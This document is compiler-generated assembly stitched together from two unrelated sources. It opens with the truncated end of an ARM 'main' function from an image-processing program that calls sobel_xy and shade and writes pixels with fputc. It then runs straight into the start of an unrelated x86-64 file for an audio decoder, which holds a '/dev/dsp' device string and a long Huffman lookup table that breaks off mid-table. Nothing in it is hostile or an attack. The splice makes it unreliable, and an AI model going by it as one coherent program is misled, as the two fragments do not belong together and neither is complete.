ldmia r3, {r2-r3} stm sp, {r2-r3} mov r3, ip mov r2, r0 mov r0, #121 bl sobel_xy b .L201 .L205: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+124 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L201 ldr r1, [fp, #-88] ldr r2, [fp, #-84] sub r3, fp, #96 mov r0, r3 bl shade .L201: mov r3, #0 str r3, [fp, #-52] b .L206 .L214: mov r3, #0 str r3, [fp, #-48] b .L207 .L211: mov r3, #2 str r3, [fp, #-44] b .L208 .L209: ldr r0, [fp, #-100] ldr r1, [fp, #-96] ldr r3, [fp, #-88] ldr r2, [fp, #-52] mul r2, r3, r2 ldr r3, [fp, #-48] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r1, r3 ldr r3, [fp, #-44] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r1, r0 mov r0, r3 bl fputc ldr r3, [fp, #-44] sub r3, r3, #1 str r3, [fp, #-44] .L208: ldr r3, [fp, #-44] cmp r3, #0 bge .L209 ldr r3, [fp, #-92] cmp r3, #0 beq .L210 ldr r3, [fp, #-100] mov r1, r3 mov r0, #0 bl fputc .L210: ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L207: ldr r3, [fp, #-88] ldr r2, [fp, #-48] cmp r2, r3 bcc .L211 mov r3, #0 str r3, [fp, #-40] b .L212 .L213: ldr r3, [fp, #-100] mov r1, r3 mov r0, #0 bl fputc ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L212: ldr r3, [fp, #-76] lsr r3, r3, #3 ldr r2, [fp, #-88] mul r3, r2, r3 rsb r3, r3, #0 and r3, r3, #3 ldr r2, [fp, #-40] cmp r2, r3 bcc .L213 ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L206: ldr r3, [fp, #-84] ldr r2, [fp, #-52] cmp r2, r3 bcc .L214 ldr r3, [fp, #-96] mov r0, r3 bl free ldr r3, [fp, #-92] cmp r3, #0 bne .L215 ldr r3, [fp, #-92] mov r0, r3 bl free .L215: ldr r3, [fp, #-100] mov r0, r3 bl fclose b .L219 .L197: ldr r3, [fp, #-116] add r3, r3, #4 ldr r3, [r3] mov r1, r3 ldr r0, .L230+144 bl printf b .L219 .L221: nop b .L219 .L222: nop b .L219 .L223: nop b .L219 .L224: nop b .L219 .L227: nop b .L219 .L228: nop b .L219 .L229: nop .L217: b .L219 .L218: ldr r2, .L230 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L220 bl __stack_chk_fail .L220: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L231: .align 2 .L230: .word .LC39 .word 858993459 .word 1071854387 .word 1080025088 .word .LC7 .word .LC8 .word .LC9 .word .LC10 .word .LC11 .word .LC12 .word .LC13 .word .LC14 .word .LC15 .word .LC16 .word .LC17 .word .LC18 .word .LC19 .word .LC20 .word .LC21 .word .LC22 .word .LC23 .word .LC24 .word .LC25 .word .LC26 .word .LC27 .word .LC28 .word .LC29 .word .LC30 .word .LC31 .word .LC32 .word .LC33 .word .LC34 .word .LC35 .word .LC36 .word 1081073664 .word .LC37 .word .LC38 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "464123.c" .intel_syntax noprefix .text .local filename .comm filename,8,8 .section .rodata .LC0: .string "/dev/dsp" .section .data.rel.local,"aw" .align 8 .type audio_name, @object .size audio_name, 8 audio_name: .quad .LC0 .section .rodata .align 32 .type g_huffman_table, @object .size g_huffman_table, 5608 g_huffman_table: .value 513 .value 0 .value 513 .value 16 .value 513 .value 1 .value 17 .value 513 .value 0 .value 1025 .value 513 .value 16 .value 1 .value 513 .value 17 .value 1025 .value 513 .value 32 .value 33 .value 513 .value 18 .value 513 .value 2 .value 34 .value 1025 .value 513 .value 0 .value 1 .value 513 .value 17 .value 513 .value 16 .value 1025 .value 513 .value 32 .value 33 .value 513 .value 18 .value 513 .value 2 .value 34 .value 513 .value 0 .value 1025 .value 513 .value 16 .value 1 .value 513 .value 17 .value 2049 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 33 .value 18 .value 2049 .value 1025 .value 513 .value 34 .value 48 .value 513 .value 3 .value 19 .value 513 .value 49 .value 513 .value 50 .value 513 .value 35 .value 51 .value 1537 .value 1025 .value 513 .value 0 .value 16 .value 17 .value 1537 .value 513 .value 1 .value 513 .value 32 .value 33 .value 1537 .value 513 .value 18 .value 513 .value 2 .value 34 .value 1025 .value 513 .value 49 .value 19 .value 1025 .value 513 .value 48 .value 50 .value 513 .value 35 .value 513 .value 3 .value 51 .value 513 .value 0 .value 1025 .value 513 .value 16 .value 1 .value 2049 .value 513 .value 17 .value 1025 .value 513 .value 32 .value 2 .value 33 .value 4609 .value 1537 .value 513 .value 18 .value 513 .value 34 .value 48 .value 1025 .value 513 .value 49 .value 19 .value 1025 .value 513 .value 3 .value 50 .value 513 .value 35 .value 4 .value 2561 .value 1025 .value 513 .value 64 .value 65 .value 513 .value 20 .value 513 .value 66 .value 36 .value 3073 .value 1537 .value 1025 .value 513 .value 51 .value 67 .value 80 .value 1025 .value 513 .value 52 .value 5 .value 81 .value 1537 .value 513 .value 21 .value 513 .value 82 .value 37 .value 1025 .value 513 .value 68 .value 53 .value 1025 .value 513 .value 83 .value 84 .value 513 .value 69 .value 85 .value 1537 .value 513 .value 0 .value 513 .value 16 .value 1 .value 513 .value 17 .value 1025 .value 513 .value 33 .value 18 .value 3585 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 34 .value 1025 .value 513 .value 48 .value 3 .value 513 .value 49 .value 19 .value 3585 .value 2049 .value 1025 .value 513 .value 50 .value 35 .value 513 .value 64 .value 4 .value 513 .value 65 .value 513 .value 20 .value 66 .value 3073 .value 1537 .value 513 .value 36 .value 513 .value 51 .value 80 .value 1025 .value 513 .value 67 .value 52 .value 81 .value 1537 .value 513 .value 21 .value 513 .value 5 .value 82 .value 1537 .value 513 .value 37 .value 513 .value 68 .value 53 .value 513 .value 83 .value 513 .value 69 .value 513 .value 84 .value 85 .value 2049 .value 1025 .value 513 .value 0 .value 16 .value 513 .value 1 .value 17 .value 2561 .value 1025 .value 513 .value 32 .value 33 .value 513 .value 18 .value 513 .value 2 .value 34 .value 3073 .value 1537 .value 1025 .value 513 .value 48 .value 3 .value 49 .value 513 .value 19 .value 513 .value 50 .value 35 .value 3073 .value 1025 .value 513 .value 65 .value 20 .value 1025 .value 513 .value 64 .value 51 .value 513 .value 66 .value 36 .value 2561 .value 1537 .value 1025 .value 513 .value 4 .value 80 .value 67 .value 513 .value 52 .value 81 .value 2049 .value 1025 .value 513 .value 21 .value 82 .value 513 .value 37 .value 68 .value 1537 .value 1025 .value 513 .value 5 .value 84 .value 83 .value 513 .value 53 .value 513 .value 69 .value 85 .value 513 .value 0 .value 1025 .value 513 .value 16 .value 1 .value 2561 .value 513 .value 17 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 33 .value 18 .value 7169 .value 2049 .value 1025 .value 513 .value 34 .value 48 .value 513 .value 49 .value 19 .value 2049 .value 1025 .value 513 .value 3 .value 50 .value 513 .value 35 .value 64 .value 1025 .value 513 .value 65 .value 20 .value 1025 .value 513 .value 4 .value 51 .value 513 .value 66 .value 36 .value 7169 .value 2561 .value 1537 .value 1025 .value 513 .value 80 .value 5 .value 96 .value 513 .value 97 .value 22 .value 3073 .value 1537 .value 1025 .value 513 .value 67 .value 52 .value 81 .value 513 .value 21 .value 513 .value 82 .value 37 .value 1025 .value 513 .value 38 .value 54 .value 113 .value 5121 .value 2049 .value 513 .value 23 .value 1025 .value 513 .value 68 .value 83 .value 6 .value 1537 .value 1025 .value 513 .value 53 .value 69 .value 98 .value 513 .value 112 .value 513 .value 7 .value 100 .value 3585 .value 1025 .value 513 .value 114 .value 39 .value 1537 .value 513 .value 99 .value 513 .value 84 .value 85 .value 513 .value 70 .value 115 .value 2049 .value 1025 .value 513 .value 55 .value 101 .value 513 .value 86 .value 116 .value 1537 .value 513 .value 71 .value 513 .value 102 .value 117 .value 1025 .value 513 .value 87 .value 118 .value 513 .value 103 .value 119 .value 1537 .value 513 .value 0 .value 513 .value 16 .value 1 .value 2049 .value 513 .value 17 .value 1025 .value 513 .value 32 .value 2 .value 18 .value 6145 .value 2049 .value 513 .value 33 .value 513 .value 34 .value 513 .value 48 .value 3 .value 1025 .value 513 .value 49 .value 19 .value 1025 .value 513 .value 50 .value 35 .value 1025 .value 513 .value 64 .value 4 .value 513 .value 65 .value 20 .value 7681 .value 4097 .value 2561 .value 1025 .value 513 .value 66 .value 36 .value 1025 .value 513 .value 51 .value 67 .value 80 .value 1025 .value 513 .value 52 .value 81 .value 97 .value 1537 .value 513 .value 22 .value 513 .value 6 .value 38 .value 513 .value 98 .value 513 .value 21 .value 513 .value 5 .value 82 .value 4097 .value 2561 .value 1537 .value 1025 .value 513 .value 37 .value 68 .value 96 .value 513 .value 99 .value 54 .value 1025 .value 513 .value 112 .value 23 .value 113 .value 4097 .value 1537 .value 1025 .value 513 .value 7 .value 100 .value 114 .value 513 .value 39 .value 1025 .value 513 .value 83 .value 53 .value 513 .value 84 .value 69 .value 2561 .value 1025 .value 513 .value 70 .value 115 .value 513 .value 55 .value 513 .value 101 .value 86 .value 2561 .value 1537 .value 1025 .value 513 .value 85 .value 87 .value 116 .value 513 .value 71 .value 102 .value 1025 .value 513 .value 117 .value 118 .value 513 .value 103 .value 119 .value 3073 .value 1025 .value 513 .value 16 .value 1 .value 513 .value 17 .value 513 .value 0 .value 513 .value 32 .value 2 .value 4097 .value 1025 .value 513 .value 33 .value 18 .value 1025 .value 513 .value 34 .value 49 .value 513 .value 19 .value 513 .value 48 .value 513 .value 3 .value 64 .value 6657 .value 2049 .value 1025 .value 513 .value 50 .value 35 .value 513 .value 65 .value 51 .value 2561 .value 1025 .value 513 .value 20 .value 66 .value 513 .value 36 .value 513 .value 4 .value 80 .value 1025 .value 513 .value 67 .value 52 .value 513 .value 81 .value 21 .value 7169 .value 3585 .value 2049 .value 1025 .value 513 .value 82 .value 37 .value 513 .value 83 .value 53 .value 1025 .value 513 .value 96 .value 22 .value 97 .value 1025 .value 513 .value 98 .value 38 .value 1537 .value 1025 .value 513 .value 5 .value 6 .value 68 .value 513 .value 84 .value 69 .value 4609 .value 2561 .value 1025 .value 513 .value 99 .value 54 .value 1025 .value 513 .value 112 .value 7 .value 113 .value 1025 .value 513 .value 23 .value 100 .value 513 .value 70 .value 114 .value 2561 .value 1537 .value 513 .value 39 .value 513 .value 85 .value 115 .value 513 .value 55 .value 86 .value 2049 .value 1025 .value 513 .value 101 .value 116 .value 513 .value 71 .value 102 .value 1025 .value 513 .value 117 .value 87 .value 513 .value 118 .value 513 .value 103 .value 119 .value 513 .value 0 .value 1537 .value 513 .value 16 .value 513 .value 1 .value 17 .value 7169 .value 2049 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 33 .value 18 .value 2049 .value 1025 .value 513 .value 34 .value 48 .value 513 .value 3 .value 49 .value 1537 .value 513 .value 19 .value 513 .value 50 .value 35 .value 1025 .value 513 .value 64 .value 4 .value 65 .value 17921 .value 7169 .value 3585 .value 1537 .value 513 .value 20 .value 513 .value 51 .value 66 .value 1025 .value 513 .value 36 .value 80 .value 513 .value 67 .value 52 .value 1025 .value 513 .value 81 .value 21 .value 1025 .value 513 .value 5 .value 82 .value 513 .value 37 .value 513 .value 68 .value 83 .value 3585 .value 2049 .value 1025 .value 513 .value 96 .value 6 .value 513 .value 97 .value 22 .value 1025 .value 513 .value 128 .value 8 .value 129 .value 4097 .value 2049 .value 1025 .value 513 .value 53 .value 98 .value 513 .value 38 .value 84 .value 1025 .value 513 .value 69 .value 99 .value 513 .value 54 .value 112 .value 1537 .value 1025 .value 513 .value 7 .value 85 .value 113 .value 513 .value 23 .value 513 .value 39 .value 55 .value 18433 .value 6145 .value 3073 .value 1025 .value 513 .value 24 .value 130 .value 513 .value 40 .value 1025 .value 513 .value 100 .value 70 .value 114 .value 2049 .value 1025 .value 513 .value 132 .value 72 .value 513 .value 144 .value 9 .value 513 .value 145 .value 25 .value 6145 .value 3585 .value 2049 .value 1025 .value 513 .value 115 .value 101 .value 513 .value 86 .value 116 .value 1025 .value 513 .value 71 .value 102 .value 131 .value 1537 .value 513 .value 56 .value 513 .value 117 .value 87 .value 513 .value 146 .value 41 .value 3585 .value 2049 .value 1025 .value 513 .value 103 .value 133 .value 513 .value 88 .value 57 .value 513 .value 147 .value 513 .value 73 .value 134 .value 1537 .value 513 .value 160 .value 513 .value 104 .value 10 .value 513 .value 161 .value 26 .value 17409 .value 6145 .value 3073 .value 1025 .value 513 .value 162 .value 42 .value 1025 .value 513 .value 149 .value 89 .value 513 .value 163 .value 58 .value 2049 .value 1025 .value 513 .value 74 .value 150 .value 513 .value 176 .value 11 .value 513 .value 177 .value 27 .value 5121 .value 2049 .value 513 .value 178 .value 1025 .value 513 .value 118 .value 119 .value 148 .value 1537 .value 1025 .value 513 .value 135 .value 120 .value 164 .value 1025 .value 513 .value 105 .value 165 .value 43 .value 3073 .value 1537 .value 1025 .value 513 .value 90 .value 136 .value 179 .value 513 .value 59 .value 513 .value 121 .value 166 .value 1537 .value 1025 .value 513 .value 106 .value 180 .value 192 .value 1025 .value 513 .value 12 .value 152 .value 193 .value 15361 .value 5633 .value 2561 .value 1537 .value 513 .value 28 .value 513 .value 137 .value 181 .value 513 .value 91 .value 194 .value 1025 .value 513 .value 44 .value 60 .value 1025 .value 513 .value 182 .value 107 .value 513 .value 196 .value 76 .value 4097 .value 2049 .value 1025 .value 513 .value 168 .value 138 .value 513 .value 208 .value 13 .value 513 .value 209 .value 513 .value 75 .value 513 .value 151 .value 167 .value 3073 .value 1537 .value 513 .value 195 .value 513 .value 122 .value 153 .value 1025 .value 513 .value 197 .value 92 .value 183 .value 1025 .value 513 .value 29 .value 210 .value 513 .value 45 .value 513 .value 123 .value 211 .value 13313 .value 7169 .value 3073 .value 1025 .value 513 .value 61 .value 198 .value 1025 .value 513 .value 108 .value 169 .value 513 .value 154 .value 212 .value 2049 .value 1025 .value 513 .value 184 .value 139 .value 513 .value 77 .value 199 .value 1025 .value 513 .value 124 .value 213 .value 513 .value 93 .value 224 .value 2561 .value 1025 .value 513 .value 225 .value 30 .value 1025 .value 513 .value 14 .value 46 .value 226 .value 2049 .value 1025 .value 513 .value 227 .value 109 .value 513 .value 140 .value 228 .value 1025 .value 513 .value 229 .value 186 .value 240 .value 9729 .value 4097 .value 1025 .value 513 .value 241 .value 31 .value 1537 .value 1025 .value 513 .value 170 .value 155 .value 185 .value 513 .value 62 .value 513 .value 214 .value 200 .value 3073 .value 1537 .value 513 .value 78 .value 513 .value 215 .value 125 .value 513 .value 171 .value 513 .value 94 .value 201 .value 1537 .value 513 .value 15 .value 513 .value 156 .value 110 .value 513 .value 242 .value 47 .value 8193 .value 4097 .value 1537 .value 1025 .value 513 .value 216 .value 141 .value 63 .value 1537 .value 513 .value 243 .value 513 .value 230 .value 202 .value 513 .value 244 .value 79 .value 2049 .value 1025 .value 513 .value 187 .value 172 .value 513 .value 231 .value 245 .value 1025 .value 513 .value 217 .value 157 .value 513 .value 95 .value 232 .value 7681 .value 3073 .value 1537 .value 513 .value 111 .value 513 .value 246 .value 203 .value 1025 .value 513 .value 188 .value 173 .value 218 .value 2049 .value 513 .value 247 .value 1025 .value 513 .value 126 .value 127 .value 142 .value 1537 .value 1025 .value 513 .value 158 .value 174 .value 204 .value 513 .value 248 .value 143 .value 4609 .value 2049 .value 1025 .value 513 .value 219 .value 189 .value 513 .value 234 .value 249 .value 1025 .value 513 .value 159 .value 235 .value 513 .value 190 .value 513 .value 205 .value 250 .value 3585 .value 1025 .value 513 .value 221 .value 236 .value 1537 .value 1025 .value 513 .value 233 .value 175 .value 220 .value 513 .value 206 .value 251 .value 2049 .value 1025 .value 513 .value 191 .value 222 .value 513 .value 207 .value 238 .value 1025 .value 513 .value 223 .value 239 .value 513 .value 255 .value 513 .value 237 .value 513 .value 253 .value 513 .value 252 .value 254 .value 4097 .value 1537 .value 513 .value 0 .value 513 .value 16 .value 1 .value 513 .value 17 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 33 .value 18 .value 12801 .value 4097 .value 1537 .value 513 .value 34 .value 513 .value 48 .value 49 .value 1537 .value 513 .value 19 .value 513 .value 3 .value 64 .value 513 .value 50 .value 35 .value 3585 .value 1537 .value 1025 .value 513 .value 4 .value 20 .value 65 .value 1025 .value 513 .value 51 .value 66 .value 513 .value 36 .value 67 .value 2561 .value 1537 .value 513 .value 52 .value 513 .value 80 .value 5 .value 513 .value 81 .value 21 .value 1025 .value 513 .value 82 .value 37 .value 1025 .value 513 .value 68 .value 83 .value 97 .value 23041 .value 9217 .value 4609 .value 2561 .value 1537 .value 513 .value 53 .value 513 .value 96 .value 6 .value 513 .value 22 .value 98 .value 1025 .value 513 .value 38 .value 84 .value 513 .value 69 .value 99 .value 2561 .value 1537 .value 513 .value 54 .value 513 .value 112 .value 7 .value 513 .value 113 .value 85 .value 1025 .value 513 .value 23 .value 100 .value 513 .value 114 .value 39 .value 6145 .value 4097 .value 2049 .value 1025 .value 513 .value 70 .value 115 .value 513 .value 55 .value 101 .value 1025 .value 513 .value 86 .value 128 .value 513 .value 8 .value 116 .value 1025 .value 513 .value 129 .value 24 .value 513 .value 130 .value 40 .value 4097 .value 2049 .value 1025 .value 513 .value 71 .value 102 .value 513 .value 131 .value 56 .value 1025 .value 513 .value 117 .value 87 .value 513 .value 132 .value 72 .value 1537 .value 1025 .value 513 .value 144 .value 25 .value 145 .value 1025 .value 513 .value 146 .value 118 .value 513 .value 103 .value 41 .value 23553 .value 9217 .value 4609 .value 2561 .value 1025 .value 513 .value 133 .value 88 .value 1025 .value 513 .value 9 .value 119 .value 147 .value 1025 .value 513 .value 57 .value 148 .value 513 .value 73 .value 134 .value 2561 .value 1537 .value 513 .value 104 .value 513 .value 160 .value 10 .value 513 .value 161 .value 26 .value 1025 .value 513 .value 162 .value 42 .value 513 .value 149 .value 89 .value 6657 .value 3585 .value 1537 .value 513 .value 163 .value 513 .value 58 .value 135 .value 1025 .value 513 .value 120 .value 164 .value 513 .value 74 .value 150 .value 1537 .value 1025 .value 513 .value 105 .value 176 .value 177 .value 1025 .value 513 .value 27 .value 165 .value 178 .value 3585 .value 2049 .value 1025 .value 513 .value 90 .value 43 .value 513 .value 136 .value 151 .value 513 .value 179 .value 513 .value 121 .value 59 .value 2049 .value 1025 .value 513 .value 106 .value 180 .value 513 .value 75 .value 193 .value 1025 .value 513 .value 152 .value 137 .value 513 .value 28 .value 181 .value 20481 .value 8705 .value 4097 .value 1537 .value 1025 .value 513 .value 91 .value 44 .value 194 .value 1537 .value 1025 .value 513 .value 11 .value 192 .value 166 .value 513 .value 167 .value 122 .value 2561 .value 1025 .value 513 .value 195 .value 60 .value 1025 .value 513 .value 12 .value 153 .value 182 .value 1025 .value 513 .value 107 .value 196 .value 513 .value 76 .value 168 .value 5121 .value 2561 .value 1025 .value 513 .value 138 .value 197 .value 1025 .value 513 .value 208 .value 92 .value 209 .value 1025 .value 513 .value 183 .value 123 .value 513 .value 29 .value 513 .value 13 .value 45 .value 3073 .value 1025 .value 513 .value 210 .value 211 .value 1025 .value 513 .value 61 .value 198 .value 513 .value 108 .value 169 .value 1537 .value 1025 .value 513 .value 154 .value 184 .value 212 .value 1025 .value 513 .value 139 .value 77 .value 513 .value 199 .value 124 .value 17409 .value 8705 .value 4609 .value 2561 .value 1025 .value 513 .value 213 .value 93 .value 1025 .value 513 .value 224 .value 14 .value 225 .value 1025 .value 513 .value 30 .value 226 .value 513 .value 170 .value 46 .value 2049 .value 1025 .value 513 .value 185 .value 155 .value 513 .value 227 .value 214 .value 1025 .value 513 .value 109 .value 62 .value 513 .value 200 .value 140 .value 4097 .value 2049 .value 1025 .value 513 .value 228 .value 78 .value 513 .value 215 .value 125 .value 1025 .value 513 .value 229 .value 186 .value 513 .value 171 .value 94 .value 2049 .value 1025 .value 513 .value 201 .value 156 .value 513 .value 241 .value 31 .value 1537 .value 1025 .value 513 .value 240 .value 110 .value 242 .value 513 .value 47 .value 230 .value 9729 .value 4609 .value 2049 .value 1025 .value 513 .value 216 .value 243 .value 513 .value 63 .value 244 .value 1537 .value 513 .value 79 .value 513 .value 141 .value 217 .value 513 .value 187 .value 202 .value 2049 .value 1025 .value 513 .value 172 .value 231 .value 513 .value 126 .value 245 .value 2049 .value 1025 .value 513 .value 157 .value 95 .value 513 .value 232 .value 142 .value 513 .value 246 .value 203 .value 8705 .value 4609 .value 2561 .value 1537 .value 1025 .value 513 .value 15 .value 174 .value 111 .value 513 .value 188 .value 218 .value 1025 .value 513 .value 173 .value 247 .value 513 .value 127 .value 233 .value 2049 .value 1025 .value 513 .value 158 .value 204 .value 513 .value 248 .value 143 .value 1025 .value 513 .value 219 .value 189 .value 513 .value 234 .value 249 .value 4097 .value 2049 .value 1025 .value 513 .value 159 .value 220 .value 513 .value 205 .value 235 .value 1025 .value 513 .value 190 .value 250 .value 513 .value 175 .value 221 .value 3585 .value 1537 .value 1025 .value 513 .value 236 .value 206 .value 251 .value 1025 .value 513 .value 191 .value 237 .value 513 .value 222 .value 252 .value 1537 .value 1025 .value 513 .value 207 .value 253 .value 238 .value 1025 .value 513 .value 223 .value 254 .value 513 .value 239 .value 255 .value 513 .value 0 .value 1537 .value 513 .value 16 .value 513 .value 1 .value 17 .value 10753 .value 2049 .value 1025 .value 513 .value 32 .value 2 .value 513 .value 33 .value 18 .value 2561 .value 1537 .value 513 .value 34 .value 513 .value 48 .value 3 .value 513 .value 49 .value 19 .value 2561 .value 1025 .value 513 .value 50 .value 35 .value 1025 .value 513 .value 64 .value 4 .value 65 .value 1537 .value 513 .value 20 .value 513 .value 51 .value 66 .value 1025 .value 513 .value 36 .value 80 .value 513 .value 67 .value 52 .value -30207 .value 10241 .value 4097 .value 1537 .value 1025 .value 513 .value 5 .value 21 .value 81 .value 1025 .value 513 .value 82 .value 37 .value 1025 .value 513 .value 68 .value 53 .value 83 .value 2561 .value 1537 .value 1025 .value 513 .value 96 .value 6 .value 97 .value 513 .value 22 .value 98 .value 2049 .value 1025 .value 513 .value 38 .value 84 .value 513 .value 69 .value 99 .value 1025 .value 513 .value 54 .value 112 .value 113 .value 10241 .value 4609 .value 2049 .value 513 .value 23 .value 513 .value 7 .value 513 .value 85 .value 100 .value 1025 .value 513 .value 114 .value 39 .value 1025 .value 513 .value 70 .value 101 .value 115 .value 2561 .value 1537 .value 513 .value 55 .value 513 .value 86 .value 8 .value 513 .value 128 .value 129 .value 1537 .value 513 .value 24 .value 513 .value 116 .value 71 .value 513 .value 130 .value 513 .value 40 .value 102 .value 6145 .value 3585 .value 2049 .value 1025 .value 513 .value 131 .value 56 .value 513 .value 117 .value 132 .value 1025 .value 513 .value 72 .value 144 .value 145 .value 1537 .value 513 .value 25 .value 513 .value 9 .value 118 .value 513 .value 146 .value 41 .value 3585 .value 2049 .value 1025 .value 513 .value 133 .value 88 .value 513 .value 147 .value 57 .value 1025 .value 513 .value 160 .value 10 .value 26 .value 2049 .value 513 .value 162 .value 513 .value 103 .value 513 .value 87 .value 73 .value 1537 .value 513 .value 148 .value 513 .value 119 .value 134 .value 513 .value 161 .value 513 .value 104 .value 149 .value -9215 .value 32257 .value 12801 .value 6657 .value 3073 .value 1537 .value 513 .value 42 .value 513 .value 89 .value 58 .value 513 .value 163 .value 513 .value 135 .value 120 .value 2049 .value 1025 .value 513 .value 164 .value 74 .value 513 .value 150 .value 105 .value 1025 .value 513 .value 176 .value 11 .value 177 .value 2561 .value 1025 .value 513 .value 27 .value 178 .value 513 .value 43 .value 513 .value 165 .value 90 .value 1537 .value 513 .value 179 .value 513 .value 166 .value 106 .value 1025 .value 513 .value 180 .value 75 .value 513 .value 12 .value 193 .value 7681 .value 3585 .value 1537 .value 1025 .value 513 .value 181 .value 194 .value 44 .value 1025 .value 513 .value 167 .value 195 .value 513 .value 107 .value 196 .value 2049 .value 513 .value 29 .value 1025 .value 513 .value 136 .value 151 .value 59 .value 1025 .value 513 .value 209 .value 210 .value 513 .value 45 .value 211 .value 4609 .value 1537 .value 1025 .value 513 .value 30 .value 46 .value 226 .value 1537 .value 1025 .value 513 .value 121 .value 152 .value 192 .value 513 .value 28 .value 513 .value 137 .value 91 .value 3585 .value 1537 .value 513 .value 60 .value 513 .value 122 .value 182 .value 1025 .value 513 .value 76 .value 153 .value 513 .value 168 .value 138 .value 1537 .value 513 .value 13 .value 513 .value 197 .value 92 .value 1025 .value 513 .value 61 .value 198 .value 513 .value 108 .value 154 .value 22529 .value 22017 .value 9217 .value 4097 .value 2049 .value 1025 .value 513 .value 139 .value 77 .value 513 .value 199 .value 124 .value 1025 .value 513 .value 213 .value 93 .value 513 .value 224 .value 14 .value 2049 .value 513 .value 227 .value 1025 .value 513 .value 208 .value 183 .value 123 .value 1537 .value 1025 .value 513 .value 169 .value 184 .value 212 .value 513 .value 225 .value 513 .value 170 .value 185 .value 6145 .value 2561 .value 1537 .value 1025 .value 513 .value 155 .value 214 .value 109 .value 513 .value 62 .value 200 .value 1537 .value 1025 .value 513 .value 140 .value 228 .value 78 .value 1025 .value 513 .value 215 .value 229 .value 513 .value 186 .value 171 .value 3073 .value 1025 .value 513 .value 156 .value 230 .value 1025 .value 513 .value 110 .value 216 .value 513 .value 141 .value 187 .value 2049 .value 1025 .value 513 .value 231 .value 157 .value 513 .value 232 .value 142 .value 1025 .value 513 .value 203 .value 188 .value 158 .value 241 .value 513 .value 31 .value 513 .value 15 .value 47 .value 16897 .value 14337 .value 513 .value 242 .value 13313 .value 12801 .value 5121 .value 2049 .value 513 .value 189 .value 513 .value 94 .value 513 .value 125 .value 201 .value 1537 .value 513 .value 202 .value 513 .value 172 .value 126 .value 1025 .value 513 .value 218 .value 173 .value 204 .value 2561 .value 1537 .value 513 .value 174 .value 513 .value 219 .value 220 .value 513 .value 205 .value 190 .value 1537 .value 1025 .value 513 .value 235 .value 237 .value 238 .value 1537 .value 1025 .value 513 .value 217 .value 234 .value 233 .value 513 .value 222 .value 1025 .value 513 .value 221 .value 236 .value 206 .value 63 .value 240 .value 1025 .value 513 .value 243 .value 244 .value 513 .value 79 .value 513 .value 245 .value 95 .value 2561 .value 513 .value 255 .value 1025 .value 513 .value 246 .value 111 .value 513 .value 247 .value 127 .value 3073 .value 1537 .value 513 .value 143 .value 513 .value 248 .value 249 .value 1025 .value 513 .value 159 .value 250 .value 175 .value 2049 .value 1025 .value 513 .value 251 .value 191 .value 513 .value 252 .value 207 .value 1025 .value 513 .value 253 .value 223 .value 513 .value 254 .value 239 .value 15361 .value 2049 .value 1025 .value 513 .value 0 .value 16 .value 513 .value 1 .value 17 .value 3585 .value 1537 .value 1025 .value 513 .value 32 .value 2 .value 33 .value 513 .value 18 .value 513 .value 34 .value 513 .value 48 .value 3 .value 3585 .value 1025 .value 513 .value 49 .value 19 .value 1025 .value 513 .value 50 .value 35 .value 1025 .value 513 .value 64 .value 4 .value 65 .value 2049 .value 1025 .value 513 .value 20 .value 51 .value 513 .value 66 .value 36 .value 1537 .value 1025 .value 513 .value 67 .value 52 .value 81 .value 1537 .value 1025 .value 513 .value 80 .value 5 .value 21 .value 513 .value 82 .value 37 .value -1535 .value 25089 .value 8705 .value 4609 .value 2561 .value 1025 .value 513 .value 68 .value 83 .value 513 .value 53 .value 513 .value 96 .value 6 .value 1025 .value 513 .value 97 .value 22 .value 513 .value 98 .value 38 .value 2049 .value 1025 .value 513 .value 84 .value 69 .value 513 .value 99 .value 54 .value 1025 .value 513 .value 113 .value 85 .value 513 .value 100 .value 70 .value 8193 .value 3585 .value 1537 .value 513 .value 114 .value 513 .value 39 .value 55 .value 513 .value 115 .value 1025 .value 513 .value 112 .value 7 .value 23 .value 2561 .value 1025 .value 513 .value 101 .value 86 .value 1025 .value 513 .value 128 .value 8 .value 129 .value 1025 .value 513 .value 116 .value 71 .value 513 .value 24 .value 130 .value 4097 .value 2049 .value 1025 .value 513 .value 40 .value 102 .value 513 .value 131 .value 56 .value 1025 .value 513 .value 117 .value 87 .value 513 .value 132 .value 72 .value 2049 .value 1025 .value 513 .value 145 .value 25 .value 513 .value 146 .value 118 .value 1025 .value 513 .value 103 .value 41 .value 513 .value 133 .value 88 .value 23553 .value 8705 .value 4097 .value 2049 .value 1025 .value 513 .value 147 .value 57 .value 513 .value 148 .value 73 .value 1025 .value 513 .value 119 .value 134 .value 513 .value 104 .value 161 .value 2049 .value 1025 .value 513 .value 162 .value 42 .value 513 .value 149 .value 89 .value 1025 .value 513 .value 163 .value 58 .value 513 .value 135 .value 513 .value 120 .value 74 .value 5633 .value 3073 .value 1025 .value 513 .value 164 .value 150 .value 1025 .value 513 .value 105 .value 177 .value 513 .value 27 .value 165 .value 1537 .value 513 .value 178 .value 513 .value 90 .value 43 .value 513 .value 136 .value 179 .value 4097 .value 2561 .value 1537 .value 513 .value 144 .value 513 .value 9 .value 160 .value 513 .value 151 .value 121 .value 1025 .value 513 .value 166 .value 106 .value 180 .value 3073 .value 1537 .value 513 .value 26 .value 513 .value 10 .value 176 .value 513 .value 59 .value 513 .value 11 .value 192 .value 1025 .value 513 .value 75 .value 193 .value 513 .value 152 .value 137 .value 17153 .value 8705 .value 4097 .value 2049 .value 1025 .value 513 .value 28 .value 181 .value 513 .value 91 .value 194 .value 1025 .value 513 .value 44 .value 167 .value 513 .value 122 .value 195 .value 2561 .value 1537 .value 513 .value 60 .value 513 .value 12 .value 